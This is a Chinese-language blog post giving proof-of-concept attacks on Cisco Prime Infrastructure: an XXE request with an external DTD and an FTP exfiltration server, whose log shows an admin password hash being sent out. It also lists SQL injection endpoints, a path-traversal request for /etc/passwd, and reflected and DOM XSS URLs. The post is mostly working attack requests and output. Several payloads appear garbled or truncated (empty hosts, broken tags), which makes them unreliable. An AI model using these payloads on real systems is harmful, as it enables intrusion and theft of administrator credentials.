AD

CiscoPrimeInfrastructure_XXE_SQLI漏洞一箩筐

漏洞说明:
       CiscoPrimeInfrastructure存在多个漏洞,包含XXE实体注入,SQL注入等。

影响范围:
v1.1~v3.1.6

POC:
       1、XXE(CVE-2017-6662)
        使用一个低权限的用户登录后,选择“设置”-“导出”,选择“PDF”格式后,点击“导出”。勾选“图表/Chart”选项,该选项会使用XML生成SVG格式的图片。
POST /webacs/prime/ui/dashboard/renderer HTTP/1.1
Host: 127.0.0.1
[...]

output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f>
x [
\"http://:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D

$ cat sectest.dtd
:2121/%data;'>">

$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_66@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD !
> 230 more data please!
< hostname
[...]
< !
> 230 more data please!
< username admin password hash
> 230 more data please!
< CWD  role admin
> 230 more data please!
< !
[...]
        2、SQLI(CVE-2017-6698)
        低权限用户可以利用SQL注入漏洞,获取到管理员密码
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=
https://127.0.0.1/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=&path=%2Froot
          需要管理员权限的注入点:
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=

https://127.0.0.1/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/&ipAddress=/&time=/&auditDescription=/&userGroup=/&activeDomain=/
https://127.0.0.1/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getJobDetails/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getAllJobs//Lightweight%20AP%20Operational%20Status
        在json中存在的注入点:
https://127.0.0.1/webacs/rs/preferences/systemPreferencesForNode/default.proxy/
(HTTP POST)
{
    "items": [
        "",
        "ProxyPort",
        "ProxyUserName",
        "ProxyPassword",
        "isProxyEnabled",
        "isProxyAuthenticated"
    ]
}

https:///webacs/rs/preferences/systemPreferencesForNode/default.swim/
(HTTP POST)
{
    "items": [
        "",
        "CCOPassword"
    ]
}


        3、任意文件读取/本地文件包含
         https://127.0.0.1/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd
GET
/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 127.0.0.1
HTTP/1.1 200 OK
Cache-Control: private
Expires: Thu, 01 Jan 1970 01:00:00 CET
Content-Disposition: attachement;
filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip"
Content-Type: application/zip
        4、XSS
        a),反射型XSS(CVE-2017-6699)
           https://127.0.0.1/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=&confUrl=
ipT>https://127.0.0.1/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=
ript>&jobResultPageId='>
        b)、DOM型XSS(CVE-2017-6700)
https://127.0.0.1/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=&jobName=">src=x onerror=alert(/XSS/)>&pageSettings=
https://127.0.0.1/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=&lastRunResultState=Success&jobId=&jobName=Mobility
Service Status&jobBreadcrumName=">




TIPS:
       CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700

REF:
       https://packetstormsecurity.com/files/143111/Cisco-Prime-Infrastructure-3.1.6-XXE-Injection-XSS-LFD-SQL-Injection.html

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略